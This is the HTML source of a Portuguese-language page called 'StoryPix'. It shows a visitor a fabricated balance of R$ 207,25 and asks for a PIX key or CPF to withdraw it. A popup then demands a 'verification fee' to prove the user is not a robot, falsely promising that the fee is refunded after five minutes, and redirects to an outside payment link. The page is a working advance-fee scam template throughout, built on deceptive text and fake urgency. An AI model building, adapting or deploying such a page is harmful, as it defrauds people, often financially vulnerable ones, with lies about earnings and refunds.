
<!DOCTYPE html><html lang="en"><head>
    <meta charset="UTF-8">
    <meta name="viewport" content="width=device-width, initial-scale=1.0, maximum-scale=1">

    <link rel="stylesheet" href="https://cdn-mars.vendd.com.br/p/LOg1GEN8ftw6XHg7CaY0ewV4wiu4EvR7EQK4npa9bDYsgfpg/v-files/css/style.css">
    <link rel="stylesheet" href="https://cdn-mars.vendd.com.br/p/LOg1GEN8ftw6XHg7CaY0ewV4wiu4EvR7EQK4npa9bDYsgfpg/v-files/css/font-awesome.min.css">
    <script src="https://cdn-mars.vendd.com.br/p/LOg1GEN8ftw6XHg7CaY0ewV4wiu4EvR7EQK4npa9bDYsgfpg/v-files/js/jquery.min.js" crossorigin="anonymous" referrerpolicy="no-referrer"></script>
    <link rel="stylesheet" href="https://cdn-mars.vendd.com.br/p/LOg1GEN8ftw6XHg7CaY0ewV4wiu4EvR7EQK4npa9bDYsgfpg/v-files/css/all.min.css" crossorigin="anonymous" referrerpolicy="no-referrer">
    <title>StoryPix</title>
    <style>
        .welcome-bar {
            background-color: #232423;
            color: white;
            padding: 10px 0;
            text-align: center;
            position: fixed;
            top: 50px;
            left: 50%;
            transform: translateX(-50%);
            width: 90%;
            border-radius: 8px;
            font-size: 13px;
            z-index: 9999;
            transition: opacity 1s;
        }

        /* Classe para ocultar a barra */
        .welcome-bar.hidden {
            opacity: 0;
            /* Torna a barra transparente */
            pointer-events: none;
            /* Impede interações com a barra */
        }

        .pop-out-foto h4 {
            font-size: 1.5em;
            /* ou qualquer tamanho que você preferir */
            font-weight: bold;
            /* ou outro peso que você prefira */
        }

        .pop-out-foto h1 {
            font-size: 2.5em;
            /* ou qualquer tamanho que você preferir */
            font-weight: bold;
            /* ou outro peso que você prefira */
        }
    </style>
    <script>
        var option = 'phone';

        function formatar(mascara, documento) {
            let i = documento.value.length;
            let saida = '#';
            let texto = mascara.substring(i);
            while (texto.substring(0, 1) != saida && texto.length) {
                documento.value += texto.substring(0, 1);
                i++;
                texto = mascara.substring(i);
            }
        }

        function checkout() {
            if ($('.pix').val().length > 4 || $('.cpf').val().length > 4) {
                $('.pop').removeClass('d-none')
                $('#audio')[0].play(); // Adicionando a reprodução do áudio ao clicar em "Concluir Saque"
                setTimeout(() => {
                    window.location.href = 'https://perfect.com';
                }, 1500);

            } else {
                alert('Preencha o pix')
            }
        }

        $(document).ready(function () {
            $('.option').click(function () {
                $('.option').removeClass('selected');
                $(this).addClass("selected");
                option = $(this).attr('id');
                console.log(option);

                if (option == 'phone') {
                    $('.phone').removeClass('d-none');
                    $('.cpf').addClass('d-none');
                } else {
                    $('.cpf').removeClass('d-none');
                    $('.phone').addClass('d-none');
                }
            });
        })
    </script>
</head>

<body style="background-color: white;">
    <header>
        <img src="https://cdn-mars.vendd.com.br/p/LOg1GEN8ftw6XHg7CaY0ewV4wiu4EvR7EQK4npa9bDYsgfpg/v-files/assets/logo.png" alt="" style="width: 150px;">
        <span class="saldo">R$ 207,25</span>
    </header>
    <div class="pop d-none">
        <div class="pop-out-foto" style="border: 1px solid grey; padding: 10px 5px;">
            <div class="bloqueado">
                <h4> PROCESSANDO PAGAMENTO</h4>
                <h1> R$ 207,25 </h1>
            </div>
            <p>Para concluirmos o pagamento, precisamos verificar se você não é um robô.</p>
            <p style="margin: 5px 0px;">Para verificar se você não é um robô apenas querendo sacar os valores ganhos no teste, pague uma taxa única de verificação. </p>
            <p style="font-weight: bold;">Mas fique tranquilo, o valor da taxa é reembolsado automaticamente após 5 minutos!
            </p>
            <div class="vtub">

            </div>
            <button class="btn-pop-out-foto" style="border: 0px;" onclick="window.location.href = 'https://perfect.com'">CONCLUIR SAQUE</button>
        </div>
    </div>
    <div class="post" style="background-color: white;">
        <div class="container">
            <div class="card" style="background-color: rgb(233, 233, 233); color: black;">
                <p>Antes de realizar seu 1 saque <b>CADASTRE SUA CHAVE PIX.</b></p>
                <p>Vamos validar seus DADOS <span style="color: rgb(96, 201, 96); font-weight: bold;"></span> para confirmar se está tudo certo.</p>
            </div>
            <p style="font-size: 13px; text-align: center; margin: 35px 0px 10px 0px;">
                <i class="fa-brands fa-pix" style="color: rgb(71, 185, 128);"></i>
                Selecione sua chave PIX
            </p>
            <div class="wrapperOption">
                <div class="option selected" id="phone">
<i class="fa-solid fa-mobile-screen-button"></i>
Celular
</div>
            <div class="option" id="cpf">
                <i class="fa-solid fa-address-card"></i>
                CPF
            </div>
        </div>
        <input class="pix phone " type="tel" placeholder="Digite seu número aqui..." onkeypress="formatar('(##) #####-####',this)" maxlength="15">
        <input class="pix cpf d-none" placeholder="Digite seu CPF aqui..." onkeypress="formatar('###.###.###-##',this)" maxlength="14">
        <button class="btn" onclick="checkout();">REALIZAR SAQUE</button>
    </div>
</div>

<script src="https://cdn-mars.vendd.com.br/p/LOg1GEN8ftw6XHg7CaY0ewV4wiu4EvR7EQK4npa9bDYsgfpg/v-files/js/script.js"></script>
<!-- Adicionando o elemento de áudio -->
<audio id="audio" src="https://s3.typebot.io/public/workspaces/cln72qxvz001cml0fqnq089u9/typebots/cloxs87k1000hjw0ffyeiel8j/blocks/n0ar7ees6hu40fy3o4mxdyqk?v=171588"></audio>

</body></html>
